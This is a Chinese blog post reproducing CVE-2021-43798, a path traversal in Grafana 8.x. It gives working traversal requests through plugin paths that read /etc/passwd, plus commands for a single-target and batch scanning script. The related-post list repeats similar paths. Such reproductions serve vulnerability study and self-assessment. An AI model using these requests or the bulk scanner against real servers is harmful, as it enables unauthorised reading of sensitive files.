Grafana 任意文件读取漏洞复现(CVE-2021-43798)

最新推荐文章于 2024-12-19 13:04:05 发布
最新推荐文章于 2024-12-19 13:04:05 发布
阅读量4.7k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: web安全评估 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_48421613/article/details/121784960
本文详细介绍了Grafana的一个未修补漏洞,该漏洞存在于8.x系列版本中,允许通过构造特定请求读取系统文件,如/etc/passwd。提供了POC验证方法及批量检测脚本,强调了其伪0day状态,并提供了脚本获取途径和使用说明。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

此文章仅用于学习以及企业自检,请不要用于违法用途。

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

通过默认存在的插件来拼接文件路径构造请求进行文件读取

漏洞状态:

该漏洞暂无补丁,伪0day状态

受影响版本:

Grafana 8.x 系列

验证poc:

构造get请求

/public/plugins/welcome/../../../../../../../../../etc/passwd
/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
第一条适合在burp里面使用,但是直接在浏览器访问会被过滤掉,第二条适用于在浏览器里直接访问,二者没有什么区别,alertlist与welcome为两个插件,基本上这两个就够用了,如果对方没有安装这俩插件那么可以将这个关键词进行枚举即可

复现过程:

在这里插入图片描述
在这里插入图片描述

使用脚本检测-支持单独检测与批量检测

python Grafana.py -u http://ip:port 注意不要在端口后加 “/”

在这里插入图片描述
批量检测:

python Grafana.py -r 12.txt

文件名字随便取

在这里插入图片描述
每个地址换行即可,不需要进行符号来区分

执行结束后会返回存在问题的url,输出至当前目录下的Grafana.txt文件内,不需要手动建立,会自动添加

在这里插入图片描述
存在漏洞的url保存结果如下
在这里插入图片描述
脚本获取方式可公众号回复
say_ohno!

我不懂安全

CVE-2021-43798脚本

或前往github下载

https://github.com/Ilovewomen/Grafana_CVE

Grafan存在url重定向&服务端请求伪造漏洞CVE-2025-4123
nnn2188185的博客
06-13 237
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发Grafana
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798
qq_51577576的博客
09-02 2364
[ vulhub漏洞复现篇 ] Grafana任意文件读取漏洞CVE-2021-43798 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana存在任意文件读取漏洞未授权的攻击者利用该漏洞,能够获取服务器敏感文件。...
漏洞复现Grafana任意文件读取漏洞(CVE-2021-43798)_grafana漏洞复现
2401_84437170的博客
04-17 1103
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana任意文件读取漏洞复现CVE-2021-43798
Bird&Bird
12-21 1933
目录1、漏洞描述2、影响版本3、环境搭建4、漏洞复现5、安全建议 1、漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。2021年12月6日,国外安全研究人员披露Grafana中某些接口在提供静态文件时,攻击者通过构造恶意请求,可造成目录遍历,读取系统上的文件。 2、影响版本 Grafana 8.3.x < 8.3.1 Grafana 8.2.x < 8.2.7 Grafana 8.1.x &lt
Grafana任意文件读取漏洞CVE-2021-43798
热门推荐
chaojixiaojingang
03-14 2万+
1.漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。未授权的攻击者利用该漏洞,能够获取服务器敏感文件。 2.影响版本 Grafana 8.0.0 - 8.3.0 3.漏洞环境搭建 更新vulhub目录,进入vulhub/grafana/CVE-2021-43798 docker-compose up –d #下载安装漏洞镜像 访问目标3000端口 4.漏洞复现 访问...
漏洞复现Grafana任意文件读取CVE-2021-43798
m0_52923241的博客
03-11 2453
只要是安装了任何一个插件就可以出现任意文件读取,因为是plugins的问题。
Grafana 任意文件读取漏洞复现分析
weixin_45794666的博客
03-02 3231
Grafana 任意文件读取漏洞复现分析 CVE-2021-43798 0x01 前言 概述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 影响范围 Grafana 8.0.0-beta1 - 8.3.0 安全版本 Grafana >= 8.3.1 Grafana >= 8.2.7 Grafana >= 8.1.8 Grafana >= 8.0.7 0x02 环境搭建 do
漏洞复现Grafana任意文件读取漏洞 (CVE-2021-43798)
李火火的安全圈
12-08 1402
0X01 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 0x02 源码分析 搜索漏洞存在路径 /public/plugins/ 在api.go文件中 r.Get("/public/plugins/:pluginId/*", hs.getPluginAssets) 跟踪对应的 getPlugin
Grafana 未经授权的任意文件读取漏洞复现CVE-2021-43798
千寻的博客
12-16 3912
文章目录漏洞名称漏洞编号漏洞描述影响版本fofa漏洞复现步骤修复建议参考链接免责声明 漏洞名称 Grafana 未经授权的任意文件读取 漏洞编号 CVE-2021-43798 漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台,用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。 影响版本 Grafana 8.x fofa app
CVE-2021-43798 Grafana 文件读取漏洞
2301_79724395的博客
04-16 1444
影响版本 Grafana 8.0.0-beta1 to 8.3.0攻击者可以通过将包含特殊目录遍历字符序列(…/)的特制HTTP请求发送到受影响的设备来利用此漏洞。成功利用该漏洞的攻击者可以在目标设备上查看文件系统上的的任意文件
Grafana任意文件读取漏洞(CVE-2021-43798)复现
小小猪的博客
12-24 2354
Grafana任意文件读取漏洞(CVE-2021-43798)复现 漏洞描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。 漏洞影响范围: Grafana 8.0.0 - 8.3.0 环境搭建: 采用vulfocus靶场 地址 漏洞复现: ...
漏洞复现CVE-2021-43798 Grafana 8.x 插件模块目录穿越漏洞
m0_53121608的博客
07-16 400
漏洞复现CVE-2021-43798 Grafana 8.x 插件模块目录穿越漏洞
Grafana 8.x 插件模块目录穿越漏洞复现CVE-2021-43798
sweelg的博客
02-28 4793
目录 漏洞环境 漏洞复现 漏洞环境 执行如下命令启动一个Grafana 8.2.6版本服务器: docker-compose up -d 访问主页 漏洞复现 burp抓包测试 读取配置文件 /public/plugins/alertlist/../../../../../../../../../../../etc/passwd 读取数据库文件 /public/plugins/alertlist/../../../../../../.....
漏洞复现Grafana任意文件读取漏洞(CVE-2021-43798)
qq_45244158的博客
12-09 1万+
Grafana 任意文件读取漏洞复现(CVE-2021-43798)
漏洞复现Grafana 安全漏洞CVE-2024-9264 | CNNVD-202410-1891)
m0_71944965的博客
12-18 1462
Grafana的SQL表达式实验性功能允许评估包含用户输入的duckdb查询。这些查询在传递给duckdb之前没有得到充分的清理,导致了命令注入和本地文件包含漏洞。任何具有VIEWER或更高权限的用户都能够执行此类攻击。此攻击需要duckdb二进制文件存在于Grafana的$PATH中;默认情况下,此二进制文件不会安装在Grafana的发行版中。
漏洞复现CVE-2024-9264 - Grafana SQL 表达式远程代码执行漏洞
渗透之路,攻防之间皆学问
12-19 1798
DuckDB 是一个轻量级、高性能的嵌入式 SQL 数据库无服务器架构:DuckDB 不需要独立的数据库服务器,它是嵌入式的,直接以二进制文件的形式集成到应用程序中,适合嵌入到各种数据处理工具和应用中。高效的分析功能:它优化了 SQL 查询的性能,尤其在大数据量分析、聚合和联接操作时表现优异,适合数据科学家和分析师使用。完全支持 SQL:支持标准 SQL 语法,用户可以方便地进行复杂的查询,提供类似于大数据系统的分析能力,但不需要大规模的基础设施。文件支持。
Grafana 任意文件读取漏洞复现
MrHatSec的博客
03-16 7627
一、漏洞描述 Grafana存在任意文件读取漏洞,通过默认存在的插件,可构造特殊的请求包读取服务器任意文件 二、漏洞影响 Grafana 8.x 三、漏洞复现 可以从登陆页面看到版本信息为 v8.2.4,此版本在漏洞射程范围之内 查看当前所使用的插件: /api/plugins?embedded=0 http://10.10.12.120:443/api/plugins?embedded=0 读取 /etc/passwd文件 POC: /public/plugins/welcome
比较常用的中间件有哪些,分别列出他们的缺点是什么,是如何解析路径的,容易漏洞利用的点在哪里?都附上漏洞复现案例
最新发布
07-26
**漏洞复现案例:CVE-2021-41773(路径穿越漏洞)** **漏洞描述**: Apache 2.4.49版本路径标准化逻辑错误,攻击者通过构造URL中的`../`可读取web目录外文件。 **复现步骤**: 1. **环境搭建**:启动Apache 2.4....
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值